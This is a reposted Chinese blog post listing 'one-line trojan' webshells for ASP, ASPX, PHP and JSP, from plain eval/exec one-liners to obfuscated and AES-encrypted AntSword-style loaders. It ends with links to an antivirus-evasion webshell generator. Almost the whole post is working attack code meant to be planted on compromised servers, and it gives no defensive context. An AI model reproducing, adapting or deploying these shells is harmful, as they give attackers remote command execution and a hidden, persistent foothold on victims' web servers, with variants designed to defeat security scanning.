一句话木马(转)

发表于 | 分类于 | 阅读次数:

常见的一句话

ASP:<%eval request("pass")%>

ASPX: <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

PHP:<?php eval(@$_POST['a']); ?>

JSP: <%Runtime.getRuntime().exec(request.getParameter("i"));%>//无回显示执行系统命令

简单变形

ASP:

1
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>//-7

ASPX:

1
2
3
4
5
6
<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>//-7

PHP:

1
<?php $_GET[a]($_GET[b]);?>

JSP:

1
2
3
4
<%
if(request.getParameter("f")!=null)(new 
java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

二次变形

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

ASP:

<%if request ("MH")<>""then session("MH")=request("MH"):end 
if:if session("MH")<>"" then execute session("MH")%>


ASPX:

<%@ Page 
Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
 "MD5").ToUpper()],"unsafe");%>//随日期变化的连接密码


PHP:<?php ($_=@$_GET[2]).@$_($_POST[1])?>



JSP:

<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

三次变形

1
2
3
4
5
6
7
ASP:<%@Page Language="C#" %><%@Import namespace="System.Reflection"%><%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>//蚁剑中的一句话


PHP:<?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//蚁剑中的一句话


JSP:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>//蚁剑中的一句话

四次变形

1
2
3
4
5
6
7
8
9
10
11
12
1、利用随机异或无限免杀d盾蚁剑版:



项目地址:https://github.com/yzddmr6/as_webshell_venom


2、利用动态二进制加密实现新型一句话木马:



文章地址:https://xz.aliyun.com/t/2799